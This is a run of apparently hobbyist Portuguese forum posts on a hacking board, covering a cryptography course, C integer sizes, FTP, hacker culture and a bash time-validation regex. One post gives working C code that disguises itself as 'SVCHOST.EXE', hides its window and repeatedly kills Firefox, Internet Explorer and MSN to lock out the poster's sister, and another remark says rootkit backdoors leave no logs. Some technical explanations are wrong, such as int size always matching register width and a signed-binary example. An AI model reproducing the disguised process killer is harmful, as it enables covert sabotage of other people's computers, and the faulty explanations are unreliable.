Mensagens

Nossa, quanto tempo faz que não logo aqui.

Enfim, fiz um curso de criptografia, no Coursera (https://class.coursera.org/crypto-010) e vi que ninguém nunca falou dele aqui. Ele jah acabou, mas fica a dica pra prox edição dele (ele tah na 10 ed). Achei bem bacana pq dah uma base teórica formal pra diversos tipos de ataque e característica de sistemas seguros e inseguros.

Então, quem tiver tesao por matemática  :D, vale bastante a pena fazer tudo, quem num tiver ainda vale a pena dar uma boa olhada. Tem exercícios de prog. que eu fiz usando Python, e eles são bem legais de fazer.

Se alguém quiser detalhes de como eh e talz, falae que eu explico.  :)

Opa, isso é antigo!! XD

Eu aprendi a codar em asm sim, e eu cheguei a aplicar essa técnica como teste em programas simples em C que eu mesmo escrevi, e funciona.

Mas não consigo fazer com programas mais complexos, eu lembro que tive muitas dificuldades em diversas etapas, desde o disasm, até a edição do asm gerado.

Mas fico feliz que durante uma aula de asm eu tenha chego a conclusão de uma técnica tão utilizada sem nem saber tanto de asm :)

Acho que isso é natural, já que a plataforna .NET vem ganhando mercado...

Muito legal Fvox, valew por compartilhar o/

esse reeves só num é mais maroto por falta de tempo! :P

e que dó das pessoas que usam ff :/

. . .

Vou responder pq eu sei como é quando vc tá aprendendo a programar.
É tenso.


Primeiro, dificilmente um int teria 16 bits, vou explicar:

um int é um WORD, que equivale a quantos bits cabem dentro de um registrador da CPU.
Um processador de 16bits, tem um inteiro de 16 bits.
Um processador de 32bits, terá um inteiro de 32bits.
Um processador de 64bits, terá um inteiro de 64bits.

Então, um int só tem 16bits se vc estiver trabalhando num 386.
Qlqr coisa mais recente, terá pelo menos 32bits.

Vc precisa TOMAR CUIDADO com esse tipo de coisa, pois quando vc trabalha com operações bit a bit, vai ter diferença de um processador para outro.
O certo então, seria você usar sizeof toda vez que vc for se referir ao 'tamanho' de um tipo.

sizeof(int) vai te retornar quantos bytes há no int no processador que você estiver exercutando o programa.

Por exemplo, se vc quiser utilizar rotacionar todos os bits para que o primeiro bit fique na última posição, vc rotacionaria num laço até sizeof(int)*8 (que te retornaria no numero de bits que há no int).
Se vc simplesmente assumisse que seu int tem 16, vc rotacionaria 16 vezes, sendo que a maioria dos processadores (que são de 32bits ou 64bits) tem int de 32 ou 64 e ae faltaria bits pra vc rotacionar.

A faixa de valor é 2^n, sendo que n é o número de bits que o tipo suporta.

Um char, que tem 8bits (1byte) tem uma faixa de 0 ~ 255.
Acontece que muitas vezes, o bit mais significativo é usado pra definir o sinal do numero.

Então a mesma sequencia de bits possui duas representações, com sinal e sem sinal.

O número 10010101 pode ser tanto -21 como 149. Como o bit mais significativo vale 1, o sinal é negativo e o resto dos bits é que dão o valor do numero.
No outro caso, o bit é considerado na hora de dar o valor ao numero.

No segundo caso, o número é que chamamos de unsigned (sem sinal) pois o valor será sempre positivo, já que não há como colocar sinal no numero (para isso, vc teria que usar o bit mais significativo)

Um tipo ocupa um numero FIXO de bits. Vc nunca vai ver um inteiro de 16 bits e um inteiro 15 bits.
O inteiro vai ser sempre 16 bits (supondo um processador de 16bits).
Não importa quantos bits vc ocupe, o resto ficará lá, sem usar, mas ficará lá.

O processador assume que vc pode usar aquele espaço e não irá mexer nele se vc não mandar.

Talvez isso de faixa mínima seja definido no ANSII para evitar que surja um inteiro de 8bits, por exemplo, fugindo do padrão original.


Mas sério, não somos professores particulares. 5 seg no google e vc encontraria uma resposta pra sua dúvida.
Mas, fica a dica, pesquise antes de vir perguntar.

FTP eh um protocolo cara, pega um programa que usa sockets e implemente os comandos simples de FTP... Eu tinha uns codigos, vou procurar, se eu achar posto aqui o/

Mas saca, pensa assim

Vc faz um prog que recebe uma string com o nome do arquivo, procure por ele na raiz, e ae entra a parte de pegar o arquivo e iniciar uma tranferencia

se vc quiser poder abrir pastas e talz, pesquisar um arquivo nos HD e talz, fica mais complicado,  mas codável ainda...

Se for um arquivo de cada vez fica bem simples mesmo

Tudo depende do que vc quer fazer...

PS. Codar um server FTP COMPLETO em um exe só é impraticavel... Duvido que ache, se achar, compartilhe :D

Olha, independente de vc ter ou não algo pra fazer... Vc fez uma coisa bacana bagarai :D

Fiquei com MTA vontade de "converter" o codigo pra C, pq eu tb não tenho nada melhor pra fazer XD

Nah, vou fazer uma coisa original, ou tentar pelo menos XD

. . .

Olha, não vou ser seu mestre, tutor, ou que quer que vc queira, mas vou te dar umas dicas...

Primeiro, jamais procure uma alma bondosa num forum sobre segurança. Vc não vai encontrar muitas, e as que vc encontrar, COM CERTEZA vão suspeitar da sua identidade. E se por um acaso algum hacker cruel e bom pegar vc, não vai ter pena, pode ter certeza...

Depois, eu não ofenderia ninguém daqui. Sério. O Darkers tem membros MTO bons... Eu tenho medo de alguns... Ao menos, se for ofender, garanta que vc tem um backup de todas as suas coisas e que não acesse o internet banking. Se tiver conta no orkut, msn, não fique surpresa se caso alguém aparecer e dizer pra vc: "O que deu em vc pra me chingar daquele jeito no msn?"

E por ultimo e não menos importante. Vc pode aprender os programas, como programar trojans, saber todas as dicas, todas as falhas. Vc ainda não será um(a) hacker. Pq o conceito de hacker é ser Auto-didata.
É você ir atrás dos códigos. É vc procurar as falhas, é vc encontra-las. Claro que vc pode ter algum amigo que te ensine uma coisa ou outra, mas ser seu tutor? É absurdo.
Vc jamais vai aprender a ser hacker com outra pessoa. Me atrevo a dizer que se essa pessoa tentar te ensinar como um tutor, ele tb não é um hacker.

Hackers valorizam a força de vontade e o espirito de aprender por si mesmo.

Se quer um professor de Hacker, procure o Prof. Marco Aurélio Thompson, e o "curso de hacker" dele.

E seja uma boa lammer ^^

Concordo com o Reeves.

Não custa nada viver o ano de 2012 com um toque de especial. Porra, a gente comemora o fim de ano com uma festa e talz, pq não fazer o mesmo com o fim de "uma era", mesmo que seja de um calendario Maia?

Sei lá, sei que o ano de 2012 vai ser foda para mim, independente de fim do mundo ou não \o/

Vai ter mta festa, mta cachaça, vou tentar participar de umas orgias mto doidas na facul.

Se o mundo acabar, vou ir feliz, se não, vai ser realmente um ano inesquecivel  8)

Bom, bom, estava aqui em casa e queria proibir que minha irmã usasse o msn, pq ela tava de castigo e talz.

E pq eu não gosto dela  >:(

Então fiz esse programinha divertido, que pode ser útil para outras pessoas, hehehe

Ele encerra alguns processos carregados na memória...

No caso, nesse exemplo, ele encerra o Firefox, o IE e o msn...

Basicamente não permite que o processo permaneça na memória por mais de 5seg...

Claro que pode-se fazer alterações pra deixar ele MAIS divertido ainda, como pra encerrar o explorer, enfim.

Sejam criativos :P

Segue o código:

Código Selecionar Expandir

#include <string.h>
#include <iostream>
#include <windows.h>
#include <tlhelp32.h>

int main(void)//killer do explorer.exe
{   
      HWND janela;
      SetConsoleTitle("SVCHOST.EXE");
      janela = FindWindow(NULL, "SVCHOST.EXE");
      ShowWindow(janela, SW_HIDE);
     
      while(1)
      {     
          Sleep(5000);
         
     
          HANDLE hProcess;
          HANDLE Snap;
     
          Snap=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);//cria uma toolhelp32snapshot para processos
          PROCESSENTRY32 pe32;// estrutura PROCESSENTRY32
     
          Process32First(Snap,&pe32); // Pega o primeiro processo( 0, o sistema )
          do
          {
              hProcess=OpenProcess(PROCESS_ALL_ACCESS,TRUE,pe32.th32ProcessID);//abre o processo
              if( (strcmp(pe32.szExeFile,"firefox.exe")==0) ||(strcmp(pe32.szExeFile,"msnmsgr.exe")==0)||(strcmp(pe32.szExeFile,"iexplore.exe")==0))//se o nome for igual à* explorer.exe
                  TerminateProcess(hProcess,0);//termina o processo
     
          }
          while(Process32Next(Snap,&pe32)); // pega os proximos processos
     }
     return 1;
}


uAHuAHuAHUHAuHAuHAUHAUhA

Sei lá, se for um admin meio esperto, ele deve olhar log, ae vai aparecer o anonymous login lá :P

backdoor não deixa log, com rootkit :P

Uia, mto bom!!

Utilitários desse tipo são como camisinhas!

É sempre bom ter
E nunca é demais ter bastante e de todos os tipos :D

Cara, é fake por vááários motivos.

Meo, não nego que algumas coisas façam MTO sentido.

Mas convenhamos, PQ UM ALIEN TERIA NARIZ?

Tipo, não faz sentido, o olfato é o sentido que menos usamos e numa sociedade mais evoluida, o olfato seria desnecessário. E aquele era um nariz MTO humano. Fake, por tanto.

Segundo, o cara mexe no alien SEM luvas. Como sabiam que o alien estava vivo?

terceiro, pq SUPOR que houve uma guerra, se suporam tb que haviam sido METEOROS que haviam feito os buracos na nave?

Esse e outros fatos MOSTRAM que é fake.

Agora... Há certos pontos que eu concordo.

PQ eles não vão pra Lua? Pq não há novas missões pra ir pra lá? Pq não há nem ROBOS pisando em solo lunar? Ou noticias deles? E o lance dos Russos desistirem logo depois dos norte-americanos conseguirem tb é mto suspeito...

Isso é MTO Arquivo X...

De qlqr modo "a verdade está lá fora"...

Eu realmente acredito que eles escondem MUITO do que eles fazem e não ficaria surpreso se houvesse uma base terrestre na lua investigando fosseis alienigenas.
Mas qlqr coisa que apareça no Youtube, é de se duvidar XD

Afinal, se os caras conseguem ir pra Lua (ou fazer 5/6 da população acreditar nisso), eles PODEM impedir que esse tipo de informação vaze e vá parar lá...

LUISK9, mas você tá certo cara, não só se preocupar com o espaço em si, mas com tudo, btw, buscar a verdade, eu acho, é importante ^^

Código Selecionar Expandir


Hora=13:23

if [[ $Hora=~'([01][0-9] | 2[0-3]):[0-5][0-9]' ]]
then
   echo Horario OK
else
   echo O horario informado esta incorreto
fi


tira os espaço entre $Hora=~'([01]......

A principio pareceu dar certo, mas aconteceu o contrário
ele aceita qualquer coisa como horario e dá como Horario OK
por exemplo atribuindo valores como 50, 34:45, etc

Não seria:

Código Selecionar Expandir


if [[ $Hora=~'([0-1][0-9] | [2][0-3]):[0-5][0-9]' ]]
then
   echo Horario OK
else
   echo O horario informado esta incorreto
fi

Não?

Programo poco em shell script, mas vê ae se funciona ^^

Dei um testada aqui, mas tá apresentando o mesmo erro de atribuir variareis que não são horas... até atribuindo variaveis como "abcd" ele tá aceitando e dando como Horario OK :/

Hum, tenta assim então:

Código Selecionar Expandir


if [[ $Hora=~'([0-1][0-9] | [2][0-3]):[0-5][0-9]' ]];
then
   echo Horario OK
else
   echo O horario informado esta incorreto
fi

O ";" antes do "then" é a unica diferença que eu vi nos códigos que eu procurei...

Veja esse, por exemplo http://www.linuxjournal.com/node/1006996

Tenta... Se não der certo, eu vou logar no linux aqui e testar pra ver o que pode ser :P

Código Selecionar Expandir


Hora=13:23

if [[ $Hora=~'([01][0-9] | 2[0-3]):[0-5][0-9]' ]]
then
   echo Horario OK
else
   echo O horario informado esta incorreto
fi


tira os espaço entre $Hora=~'([01]......

A principio pareceu dar certo, mas aconteceu o contrário
ele aceita qualquer coisa como horario e dá como Horario OK
por exemplo atribuindo valores como 50, 34:45, etc

Não seria:

Código Selecionar Expandir


if [[ $Hora=~'([0-1][0-9] | [2][0-3]):[0-5][0-9]' ]]
then
   echo Horario OK
else
   echo O horario informado esta incorreto
fi

Não?

Programo poco em shell script, mas vê ae se funciona ^^